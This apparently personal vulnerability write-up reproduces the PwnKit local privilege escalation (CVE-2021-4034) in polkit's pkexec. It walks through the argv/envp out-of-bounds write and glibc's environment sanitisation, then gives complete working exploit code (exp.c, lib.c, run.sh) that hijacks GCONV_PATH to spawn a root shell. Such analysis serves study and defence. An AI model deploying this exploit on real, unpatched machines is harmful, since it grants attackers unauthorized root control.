Background
The reason of reproducing this vulnerability is because this vulnerability is quite interesting – it takes the advantage of out range writing and make it as a vector to do priviledge escalation.
Moreover, after reading some articles, two questions remain in my mind:
- Why can’t we set LD_PRELOAD to do the command execution? Many attackers use such way to bypass disabled function for PHP.
- If LD_PRELOAD cannot, why GCOV_PATH can? Why other sensitive environment var cannot be used? What is the unique points of it?
Though a few articles do touch the surface of these two questions, none of them give a comprehension answer.
Therefore, with these two questions in my mind, I start my journey to reproduce this vulnerability.
Reproduction Environment
There is an exisiting docker image for this issue created by “chenaotian”. https://hub.docker.com/r/chenaotian/cve-2021-4034
Therefore, we can use it directly.
docker run -d -ti --rm -h cvedebug --name cvedebug --cap-add=SYS_PTRACE chenaotian/cve-2021-4034:latest /bin/bash
docker exec -it cvedebug /bin/bash
cd ~
ls
What good about this image is that it also contains debuger.
Vulnerability Analysis
Many articles do a great job for this part. I will go over this again in the most straightforward way.
“pkexec allows an authorized user to execute PROGRAM as another user. If username is not specified, then the program will be executed as the administrative super user, root.”
pkexec has its SUID bit set.
The logic to process parameter starts from line 533
https://github.com/wingo/polkit/blob/master/src/programs/pkexec.c
the n is initialized as 1 and program uses argv[n] to fetch the first arguements.
It is a common way to do so because argv[0] is “pkexec” itself when pkexec is initated in the termnial.
gdb /usr/local/bin/pkexec
Reading symbols from /usr/local/bin/pkexec...done.
pwndbg> b main
Breakpoint 1 at 0x1fb0: file pkexec.c, line 387.
pwndbg> r
|---------+---------+-----+------------|---------+---------+-----+------------|
| argv[0] | argv[1] | ... | argv[argc] | envp[0] | envp[1] | ... | envp[envc] |
|----|----+----|----+-----+-----|------|----|----+----|----+-----+-----|------|
V V V V V V
"program" "-option" NULL "value" "PATH=name" NULL
This time, though argv[1] is already out of bound, it does not point to anything meaningful. Another noticeable observation is that argv[argc+1] is the posititon of environment vars. This also can be proved by the source code of execve()
// linux5.4/fs/binfmt_elf.c: 163 static int 164 create_elf_tables(struct linux_binprm *bprm, struct elfhdr *exec, 165 unsigned long load_addr, unsigned long interp_load_addr) 166 { ... 284 sp = STACK_ADD(p, ei_index); ... 306 /* Now, let's put argc (and argv, envp if appropriate) on the stack */ // argc enters the stack 307 if (__put_user(argc, sp++)) 308 return -EFAULT; 309 // argvs enter the attack 310 /* Populate list of argv pointers back to argv strings. */ 311 p = current->mm->arg_end = current->mm->arg_start; 312 while (argc-- > 0) { 313 size_t len; 314 if (__put_user((elf_addr_t)p, sp++)) 315 return -EFAULT; 316 len = strnlen_user((void __user *)p, MAX_ARG_STRLEN); 317 if (!len || len > MAX_ARG_STRLEN) 318 return -EINVAL; 319 p += len; 320 } // argv null enters 321 if (__put_user(0, sp++)) 322 return -EFAULT; 323 current->mm->arg_end = p; 324 // env enters 325 /* Populate list of envp pointers back to envp strings. */ 326 current->mm->env_end = current->mm->env_start = p; 327 while (envc-- > 0) { 328 size_t len; 329 if (__put_user((elf_addr_t)p, sp++)) 330 return -EFAULT; 331 len = strnlen_user((void __user *)p, MAX_ARG_STRLEN); 332 if (!len || len > MAX_ARG_STRLEN) 333 return -EINVAL; 334 p += len; 335 } // env null enters 336 if (__put_user(0, sp++)) 337 return -EFAULT;\ ... }
While what if the pkexec is executed by execve() and explicitly set the argv to (char**){NULL}?
The answer is the argc will become 0 and argv[1] will point to environment vars (and argv[0] is NULL).
On line 609, path is assigned as the value of argv[1] which is actually envp[0].
On line 631, s is assigned with the absoulute path of path in the PATH, which is found by the name
The g_find_program_in_path’s definition can be found https://fossies.org/dox/pkg-config-0.29.2/gutils_8c_source.html#l00298
On line 638, argv[1], which is envp[0], is written by s
Therefore, we are able to write a new temp environment varaible.
From Qualys:
If our PATH environment variable is “PATH=name”, and if the directory “name” exists (in the current working directory) and contains an executable file named “value”, then a pointer to the string “name/value” is written out-of-bounds to envp[0];
If our PATH is “PATH=name=.”, and if the directory “name=.” exists and contains an executable file named “value”, then a pointer to the string “name=./value” is written out-of-bounds to envp[0].
https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
An example will be
# Before execution, create a directory "ABC\=."
# then create a file called "test" inside of the direcotry
#
char *a_argv[]={ NULL };
char *a_envp[]={
"test",
"PATH=ABC=.",
NULL
};
execve("/usr/bin/pkexec", a_argv, a_envp);
According to the above logic, envp[0] will become ABC=./test
What’s the point to spend lots of time to inject a environment var?
Why cannot we just pass in our crafted environment var when do execve()?
This is because the dynamic linker ld-linux-x86-64.so.2 will clean the sensitive environment vars.
# _dl_non_dynamic_init: glibc-2.27/elf/dl-support.c : 307
void
_dl_non_dynamic_init (void)
{
··· ···
··· ···
if (__libc_enable_secure) //when SUID set
{
static const char unsecure_envvars[] =
UNSECURE_ENVVARS
#ifdef EXTRA_UNSECURE_ENVVARS
EXTRA_UNSECURE_ENVVARS
#endif
;
const char *cp = unsecure_envvars;
//(unset all unsecured envvars)
while (cp < unsecure_envvars + sizeof (unsecure_envvars))
{
__unsetenv (cp);
cp = (const char *) __rawmemchr (cp, '\0') + 1;
}
#if !HAVE_TUNABLES
if (__access ("/etc/suid-debug", F_OK) != 0)
__unsetenv ("MALLOC_CHECK_");
#endif
}
··· ···
··· ···
}
# glibc-2.27/sysdeps/generic/unsecvars.h : 10
#define GLIBC_TUNABLES_ENVVAR "GLIBC_TUNABLES\0"
#define UNSECURE_ENVVARS \
"GCONV_PATH\0" \
"GETCONF_DIR\0" \
GLIBC_TUNABLES_ENVVAR \
"HOSTALIASES\0" \
"LD_AUDIT\0" \
"LD_DEBUG\0" \
"LD_DEBUG_OUTPUT\0" \
"LD_DYNAMIC_WEAK\0" \
"LD_HWCAP_MASK\0" \
"LD_LIBRARY_PATH\0" \
"LD_ORIGIN_PATH\0" \
"LD_PRELOAD\0" \
"LD_PROFILE\0" \
"LD_SHOW_AUXV\0" \
"LD_USE_LOAD_BIAS\0" \
"LOCALDOMAIN\0" \
"LOCPATH\0" \
"MALLOC_TRACE\0" \
"NIS_PATH\0" \
"NLSPATH\0" \
"RESOLV_HOST_CONF\0" \
"RES_OPTIONS\0" \
"TMPDIR\0" \
"TZDIR\0"
Exploit
The g_printerr() function is used several times in pkexec. If the environment variable CHARSET is not UTF-8, g_printerr() will call glibc’s function iconv_open() to convert the message from UTF-8 to another format.
The iconv_open() function requests a conversion descriptor that converts the sequence of characters from encoding fromcode to encoding tcode. The conversion descriptor contains the conversion status. for each character set is stored in a .so file. Then follow the instructions in the gconv-modules file to link to the .so file corresponding to the parameter to perform the specific operation. If the environment variable GCONV_PATH is present, the iconv_open() function finds the gconv-modules file according to GCONV_PATH, and the subsequent operations remain unchanged.
Therefore, the rest of thing is to find a way to trigger iconv_open()
Fortunately, there is a process called “validate_environment_varaible”
So we can see if one of the varaible key is called “SHELL” or “XAUTHORITY”, g_printerr() will be triggered.
Knowing all above, the following exp will be easy to understand:
(codes are from https://github.com/chenaotian/CVE-2021-4034)
# exp.c
#include <stdio.h>
#include <unistd.h>
int main(int argc, char **argv)
{
char * const a_argv [] = { NULL};
char * const a_envp[] = {
"pwnkitdir",
"PATH=GCONV_PATH=.",
"CHARSET=PWNKIT",
"SHELL=xxx",
NULL
};
execve("/usr/local/bin/pkexec", a_argv, a_envp);
}
# lib.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
static void __attribute__ ((constructor)) exp(void);
static void exp(void)
{
setuid(0); seteuid(0); setgid(0); setegid(0);
static char *a_argv[] = { "sh", NULL };
static char *a_envp[] = { "PATH=/bin:/usr/bin:/sbin", NULL };
execve("/bin/sh", a_argv, a_envp);
}
# run.sh
mkdir 'GCONV_PATH=.'
touch 'GCONV_PATH=./pwnkitdir'
chmod 777 'GCONV_PATH=./pwnkitdir'
mkdir pwnkitdir
touch pwnkitdir/gconv-modules
echo "module UTF-8// PWNKIT// pwnkit 1" >> pwnkitdir/gconv-modules
gcc -fPIC -shared lib.c -o pwnkitdir/pwnkit.so
gcc exp.c -o exp
Answsers to First Two Questions
During the journey of reproduction, I do found the answers to the first two questions.
Why can’t we set LD_PRELOAD to do the command execution? Many attackers use such way to bypass disabled function for PHP.
This is because LD_PRELOAD only takes effect before programs execution. Since the pkexec’s vulnerability is in main method, resetting LD_PRELOAD will not change dynamic linker.
Why it is useful for PHP? This is because many PHP functions fork new process and it is during the fork process that LD_PRELOAD takes effect (because child process inherites pararent’s environment).
If LD_PRELOAD cannot, why GCOV_PATH can? Why other sensitive environment var cannot be used? What is the unique points of it?
The reason why GCOV_PATH can is illustrated in the exploit section – icov_open() will use this path to find .so file.
Why it seems to be the only vector in all exploits?
This is because on line 701, environment is sanitized. So the attack must be happen before line 701 and after line 638 (where the environment is modified). It is a small range so probabaly GCOV_PATH is the only chance to hijack.
References
https://github.com/chenaotian/CVE-2021-4034
https://xz.aliyun.com/t/10905
https://saucer-man.com/information_security/876.html
https://github.com/wingo/polkit/blob/master/src/programs/pkexec.c
https://www.yijinglab.com/specialized/20220222150802
https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
http://blog.gamous.cn/post/cve-2021-4034/
https://www.iceswordlab.com/2022/02/10/CVE-2021-4034/